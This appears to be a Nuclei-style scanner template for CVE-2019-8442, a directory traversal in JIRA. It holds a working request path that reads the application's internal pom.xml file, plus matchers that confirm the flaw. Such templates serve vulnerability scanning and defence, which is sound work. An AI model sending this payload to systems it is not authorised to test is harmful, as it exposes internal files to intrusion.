20 lines
457 B
YAML
20 lines
457 B
YAML
id: cve-2019-8442
|
|
info:
|
|
name: JIRA Directory Traversal
|
|
author: Kishore Krishna (siLLyDaddy)
|
|
severity: medium
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- >-
|
|
{{BaseURL}}/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- <groupId>com.atlassian.jira</groupId>
|
|
part: body
|